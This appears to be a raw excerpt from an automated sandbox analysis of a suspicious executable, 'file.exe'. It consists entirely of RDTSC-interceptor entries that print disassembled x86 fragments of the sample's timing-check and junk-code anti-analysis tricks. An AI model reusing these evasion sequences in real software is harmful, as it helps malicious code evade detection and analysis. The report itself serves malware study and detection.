              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE8E3 second address: 3EE96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5E68513428h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D1B8Fh] 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov edi, dword ptr [ebp+122D35DEh] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jmp 00007F5E6851342Fh 0x00000043 mov eax, dword ptr [ebp+122D02B5h] 0x00000049 mov dword ptr [ebp+122D2142h], ecx 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007F5E68513428h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 0000001Ah 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b nop 0x0000006c push edi 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE96F second address: 3EE992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F1Eh 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E68E41F1Bh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F408B second address: 3F40AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E6851342Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E68513430h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F40AF second address: 3F40FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F5E68E41F16h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sub dword ptr [ebp+122D1DDAh], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F5E68E41F18h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov edi, 77A710A4h 0x00000036 push 00000000h 0x00000038 mov edi, ecx 0x0000003a add edi, dword ptr [ebp+12481F3Dh] 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F40FD second address: 3F4102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F62A8 second address: 3F6317 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F5E68E41F18h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+12461EF0h], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F5E68E41F18h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov ebx, dword ptr [ebp+1247E9FEh] 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+1247949Fh], esi 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F5E68E41F23h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F53DC second address: 3F543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 mov di, 5B60h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr fs:[00000000h], esp 0x00000018 mov eax, dword ptr [ebp+122D09F5h] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F5E68513428h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 add ebx, dword ptr [ebp+122D3772h] 0x0000003e push FFFFFFFFh 0x00000040 mov dword ptr [ebp+122D1C0Bh], edx 0x00000046 push eax 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F5E6851342Dh 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F73AF second address: 3F73D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f ja 00007F5E68E41F16h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F9BE9 second address: 3F9BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB84D second address: 3FB871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F5E68E41F1Fh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB871 second address: 3FB8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5E68513426h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d movsx edi, bx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F5E68513428h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1CEEh], eax 0x00000032 push 00000000h 0x00000034 and bx, BA10h 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jng 00007F5E6851343Eh 0x00000041 jmp 00007F5E68513438h 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB8D2 second address: 3FB901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E68E41F29h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB901 second address: 3FB907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBB5B second address: 3FBB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FCAD3 second address: 3FCAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68513434h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FE948 second address: 3FE94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FDB2C second address: 3FDB31 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FE94D second address: 3FE964 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F5E68E41F16h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F5E68E41F1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FE964 second address: 3FE968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FE968 second address: 3FE9E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F5E68E41F18h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F5E68E41F18h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 je 00007F5E68E41F1Ch 0x00000046 mov dword ptr [ebp+12461EF0h], edi 0x0000004c push 00000000h 0x0000004e movsx edi, cx 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pop ebx 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406B17 second address: 406B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406B21 second address: 406B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406200 second address: 406220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jo 00007F5E68513426h 0x0000000f jmp 00007F5E6851342Eh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406220 second address: 40624B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F5E68E41F1Ah 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E68E41F25h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4063CF second address: 406403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68513436h 0x00000009 jmp 00007F5E68513438h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406403 second address: 406408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409D56 second address: 409D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5E68513426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409DE6 second address: 409E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F5E68E41F1Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409E04 second address: 409E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jno 00007F5E68513426h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409E19 second address: 409E1E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409F04 second address: 409F0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409F0A second address: 409F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5E68E41F16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F5E68E41F26h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 jmp 00007F5E68E41F27h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4107FC second address: 41080F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E68513426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410921 second address: 410938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E68E41F21h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410938 second address: 41096D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513434h 0x00000007 jnp 00007F5E68513443h 0x0000000d jmp 00007F5E68513437h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41096D second address: 41098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5E68E41F22h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410E2D second address: 410E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410E31 second address: 410E7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F29h 0x00000007 jmp 00007F5E68E41F24h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F5E68E41F16h 0x00000016 jmp 00007F5E68E41F22h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410E7C second address: 410E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410E84 second address: 410E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410E89 second address: 410E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410E8F second address: 410E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 411169 second address: 411171 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41CD3B second address: 41CD3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41CD3F second address: 41CD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41CD4B second address: 41CD57 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E68E41F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391437 second address: 39143B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E04AE second address: 3E04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0AD9 second address: 3E0ADF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0E8B second address: 3E0E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E168E second address: 3E1692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1692 second address: 3E169C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E169C second address: 3E16BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F5E6851342Ah 0x0000000f jp 00007F5E68513426h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E16BC second address: 3E1757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D27D9h] 0x0000000d mov dx, 2D85h 0x00000011 lea eax, dword ptr [ebp+1248818Dh] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F5E68E41F18h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov ecx, dword ptr [ebp+122D3726h] 0x00000037 mov dword ptr [ebp+122D1CAAh], ecx 0x0000003d nop 0x0000003e pushad 0x0000003f pushad 0x00000040 ja 00007F5E68E41F16h 0x00000046 je 00007F5E68E41F16h 0x0000004c popad 0x0000004d push eax 0x0000004e jno 00007F5E68E41F16h 0x00000054 pop eax 0x00000055 popad 0x00000056 push eax 0x00000057 pushad 0x00000058 jo 00007F5E68E41F18h 0x0000005e pushad 0x0000005f popad 0x00000060 jns 00007F5E68E41F2Bh 0x00000066 popad 0x00000067 nop 0x00000068 movzx edi, bx 0x0000006b lea eax, dword ptr [ebp+12488149h] 0x00000071 mov edi, 6596DE5Ah 0x00000076 nop 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C2C3 second address: 41C2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C2C8 second address: 41C2CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C2CD second address: 41C2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E6851342Ah 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C2E0 second address: 41C2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C2E4 second address: 41C2EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C5A6 second address: 41C5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F5E68E41F16h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C5B5 second address: 41C5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C5B9 second address: 41C5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C5BF second address: 41C5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E6851342Bh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C718 second address: 41C71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C71C second address: 41C72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jc 00007F5E68513426h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C8B7 second address: 41C8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41C8BB second address: 41C8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41F97A second address: 41F996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jbe 00007F5E68E41F30h 0x0000000c jns 00007F5E68E41F1Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41F996 second address: 41F99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424166 second address: 42417E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F24h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242BC second address: 4242CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E6851342Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242CF second address: 4242DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5E68E41F16h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242DC second address: 4242E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4245CB second address: 4245D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424A21 second address: 424A36 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E68513426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F5E68513426h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424A36 second address: 424A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424BEF second address: 424BF9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E6851342Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424D4F second address: 424D83 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E68E41F1Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F5E68E41F23h 0x00000010 js 00007F5E68E41F16h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
